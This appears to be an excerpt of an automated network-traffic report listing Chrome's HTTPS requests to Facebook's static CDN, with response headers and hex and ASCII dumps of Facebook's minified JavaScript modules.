                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("DOMControl",["$","DataStore"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a){this.root=b("$").fromIDOrElement(a),this.updating=!1,b("DataStore").set(a,"DOMControl",this)}var c=a.prototype;c.getRoot=function(){return


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                59192.168.2.449809157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC374OUTGET /rsrc.php/v3/ys/r/pg8jih5T_9q.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: S/RW7UT0dsoYKhdDMbB2ng==
                                                                                                                                                                                                                                Expires: Thu, 25 Sep 2025 15:36:44 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: eZxJe8gpaGQFuGG/IHdCINLOvBZHu6IwNyMQ3KuOB+zUcS3hBZ+Ru1pMeQA29z8CAXUuexwr4KdXc1v3E2T0Tw==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:22 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 17188
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC16384INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 63 73 78 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 63 73 78 3a 20 55 6e 65 78 70 65 63 74 65 64 20 63 6c 61 73 73 20 73 65 6c 65 63 74 6f 72 20 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 2e 22 29 7d 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 67 65 74 4f 72 43 72 65 61 74 65 44 4f 4d 49 44 22 2c 5b 22 75 6e 69 71 75 65 49 44 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 61 2e 69 64 7c 7c 28 61 2e 69 64 3d 63 28 22 75 6e 69 71 75 65 49 44 22
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("csx",[],(function(a,b,c,d,e,f){function a(a){throw new Error("csx: Unexpected class selector transformation.")}f["default"]=a}),66);__d("getOrCreateDOMID",["uniqueID"],(function(a,b,c,d,e,f,g){function a(a){a.id||(a.id=c("uniqueID"
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC803INData Raw: 67 22 26 26 28 61 3d 63 28 22 24 22 29 28 61 29 29 3b 72 65 74 75 72 6e 20 63 28 22 53 74 79 6c 65 43 6f 72 65 22 29 2e 67 65 74 46 6c 6f 61 74 28 61 2c 62 29 7d 7d 29 3b 62 3d 61 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 63 73 73 56 61 72 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 63 73 73 56 61 72 28 22 27 2b 61 2b 27 22 29 3a 20 55 6e 65 78 70 65 63 74 65 64 20 63 6c 61 73 73 20 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 2e 27 29 7d 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 73 65 74 49 6d 6d 65 64 69 61 74 65 22 2c 5b 22 54 69 6d 65 53 6c 69
                                                                                                                                                                                                                                Data Ascii: g"&&(a=c("$")(a));return c("StyleCore").getFloat(a,b)}});b=a;g["default"]=b}),98);__d("cssVar",[],(function(a,b,c,d,e,f){function a(a){throw new Error('cssVar("'+a+'"): Unexpected class transformation.')}f["default"]=a}),66);__d("setImmediate",["TimeSli


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                60192.168.2.449804157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC581OUTGET /rsrc.php/v3/yQ/r/WeajZf_EolU.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: Ngjnb72jUa3bDnjuqnOv0Q==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 11:51:10 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: 0so4kiqzXCFzmBC+0jKXLX9pVNka5XSv8/JpyXx5aKfHqhqw1cJqPnjKk8DnATUaSGtelLOf6ajYX40SAGXEOw==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:22 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 51589
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 44 53 69 67 6e 61 6c 42 75 66 66 65 72 44 61 74 61 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 7b 7d 3b 62 3d 61 3b 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 53 69 67 6e 61 6c 56 61 6c 75 65 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 69 73 2e 63 6e 3d 61 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 62 2e 67 65 74 53 69 67 6e 61 6c 56 61 6c 75 65 43 6f 6e 74 65 78 74
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("BDSignalBufferData",[],(function(a,b,c,d,e,f){"use strict";a={};b=a;f["default"]=b}),66);__d("SignalValueContext",[],(function(a,b,c,d,e,f){"use strict";a=function(){function a(a){this.cn=a}var b=a.prototype;b.getSignalValueContext
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC16384INData Raw: 6c 6c 65 63 74 53 69 67 6e 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 21 3d 6e 75 6c 6c 3b 61 26 26 74 68 69 73 2e 70 61 75 73 65 4c 69 73 74 65 6e 65 72 73 28 29 3b 61 3d 6e 65 77 28 63 28 22 42 6f 6f 6c 65 61 6e 53 69 67 6e 61 6c 56 61 6c 75 65 54 79 70 65 22 29 29 28 44 61 74 65 2e 6e 6f 77 28 29 2c 74 68 69 73 2e 67 65 74 43 6f 6e 74 65 78 74 28 29 2c 61 29 3b 61 3d 7b 73 69 67 6e 61 6c 49 64 3a 74 68 69 73 2e 73 69 67 6e 61 6c 54 79 70 65 2c 64 61 74 61 3a 7b 76 61 6c 75 65 4f 72 45 72 72 6f 72 3a 61 7d 7d 3b 77 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 64 28 22 42 44 42 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 43 6f 6c 6c 65 63 74 6f 72 42 61 73 65 22 29 2e 42 49 4f 4d
                                                                                                                                                                                                                                Data Ascii: llectSignals=function(a){a=a!=null;a&&this.pauseListeners();a=new(c("BooleanSignalValueType"))(Date.now(),this.getContext(),a);a={signalId:this.signalType,data:{valueOrError:a}};window.dispatchEvent(new CustomEvent(d("BDBiometricSignalCollectorBase").BIOM
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC16384INData Raw: 44 5f 42 55 46 46 45 52 5f 53 49 5a 45 2c 7b 73 69 7a 65 3a 61 2e 74 6f 53 74 72 69 6e 67 28 29 2c 74 79 70 65 3a 22 64 22 7d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 67 65 74 44 79 6e 61 6d 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 64 79 6e 61 6d 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 7d 3b 62 2e 73 65 74 42 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3e 31 3f 74 68 69 73 2e 62 69 6f 6d 65 74 72 69 63 53 69 67 6e 61 6c 42 75 66 66 65 72 53 69 7a 65 3d 61 3a 64 28 22 42 44 4f 70 65 72 61 74 69 6f 6e 4c 6f 67 48 65 6c 70 65 72 22 29 2e 6c 6f 67 45 72 72 6f 72 28 68 2c 64 28 22 42
                                                                                                                                                                                                                                Data Ascii: D_BUFFER_SIZE,{size:a.toString(),type:"d"});return this};b.getDynamicSignalBufferSize=function(){return this.dynamicSignalBufferSize};b.setBiometricSignalBufferSize=function(a){a>1?this.biometricSignalBufferSize=a:d("BDOperationLogHelper").logError(h,d("B
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC2948INData Raw: 26 26 78 2e 67 65 74 48 65 61 72 74 62 65 61 74 49 6e 74 65 72 76 61 6c 4d 73 28 29 3e 30 26 26 28 7a 2e 63 6f 6c 6c 65 63 74 48 65 61 72 74 62 65 61 74 54 69 6d 65 73 28 71 2c 72 29 2c 70 21 3d 3d 30 26 26 28 77 69 6e 64 6f 77 2e 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 70 29 2c 64 28 22 42 44 4f 70 65 72 61 74 69 6f 6e 4c 6f 67 48 65 6c 70 65 72 22 29 2e 6c 6f 67 57 61 72 6e 69 6e 67 28 6a 2c 64 28 22 42 44 4c 6f 67 67 69 6e 67 43 6f 6e 73 74 61 6e 74 73 22 29 2e 4f 50 45 52 41 54 49 4f 4e 53 2e 48 42 5f 41 4c 52 45 41 44 59 5f 52 55 4e 4e 49 4e 47 29 29 2c 70 3d 77 69 6e 64 6f 77 2e 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 7a 2e 63 6f 6c 6c 65 63 74 48 65 61 72 74 62 65 61 74 54 69 6d 65 73 28 71 2c 72
                                                                                                                                                                                                                                Data Ascii: &&x.getHeartbeatIntervalMs()>0&&(z.collectHeartbeatTimes(q,r),p!==0&&(window.clearInterval(p),d("BDOperationLogHelper").logWarning(j,d("BDLoggingConstants").OPERATIONS.HB_ALREADY_RUNNING)),p=window.setInterval(function(){return z.collectHeartbeatTimes(q,r


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                61192.168.2.449810157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC581OUTGET /rsrc.php/v3/yO/r/_tJ17sGyxOX.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: cxEZEvS096W1UB3HTVACWw==
                                                                                                                                                                                                                                Expires: Sun, 21 Sep 2025 01:05:36 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: zrbxB9/VCE1i/ptyMUlqWBmMHnUKfUtqEnNRYzLrIJ55fzfBOvHaOCfkph55Prg727nV3EkSBuEFB6vZBHa5ew==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:22 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 18154
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC16384INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 2f 74 33 68 4f 4c 73 38 77 6c 58 79 2f 0a 20 2a 2f 0a 5f 5f 64 28 22 6a 61 76 61 73 63 72 69 70 74 2d 62 6c 6f 77 66 69 73 68 2d 31 2e 30 2e 35 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 3d 7b 7d 3b 76 61 72 20 67 3d 7b 65 78 70 6f 72 74 73 3a 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 74 68 69 73 2e 6b 65 79 3d 62 2c 28 63 3d 3d 3d 22 65 63 62 22 7c 7c 63 3d 3d 3d 22 63 62 63 22 29 26 26 28 74 68
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*//** * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/ */__d("javascript-blowfish-1.0.5",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a=function(b,c){this.key=b,(c==="ecb"||c==="cbc")&&(th
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1769INData Raw: 37 34 2c 31 35 33 39 32 34 31 39 34 39 2c 34 35 38 37 38 38 31 36 30 2c 33 34 33 36 33 31 35 30 30 37 2c 31 38 30 37 30 31 36 38 39 31 2c 33 37 31 38 34 30 38 38 33 30 2c 39 37 38 39 37 36 35 38 31 2c 31 30 34 33 36 36 33 34 32 38 2c 33 31 36 35 39 36 35 37 38 31 2c 31 39 32 37 39 39 30 39 35 32 2c 34 32 30 30 38 39 31 35 37 39 2c 32 33 37 32 32 37 36 39 31 30 2c 33 32 30 38 34 30 38 39 30 33 2c 33 35 33 33 34 33 31 39 30 37 2c 31 34 31 32 33 39 30 33 30 32 2c 32 39 33 31 39 38 30 30 35 39 2c 34 31 33 32 33 33 32 34 30 30 2c 31 39 34 37 30 37 38 30 32 39 2c 33 38 38 31 35 30 35 36 32 33 2c 34 31 36 38 32 32 36 34 31 37 2c 32 39 34 31 34 38 34 33 38 31 2c 31 30 37 37 39 38 38 31 30 34 2c 31 33 32 30 34 37 37 33 38 38 2c 38 38 36 31 39 35 38 31 38 2c 31 38
                                                                                                                                                                                                                                Data Ascii: 74,1539241949,458788160,3436315007,1807016891,3718408830,978976581,1043663428,3165965781,1927990952,4200891579,2372276910,3208408903,3533431907,1412390302,2931980059,4132332400,1947078029,3881505623,4168226417,2941484381,1077988104,1320477388,886195818,18


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                62192.168.2.449811157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC374OUTGET /rsrc.php/v3/yn/r/BTuEBPL3Mnd.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: SSGtfbAxBhRkHRMbiDwz5Q==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 17:03:12 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: kXeclyifGJzn7kDt7pgMb/H1X/4XVsSVw5/ZUwMBHtkE8VZi0rtFx+7hV7hHRV+DJYGfqqxQNw6M7QSNODKm8g==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:22 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 24223
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
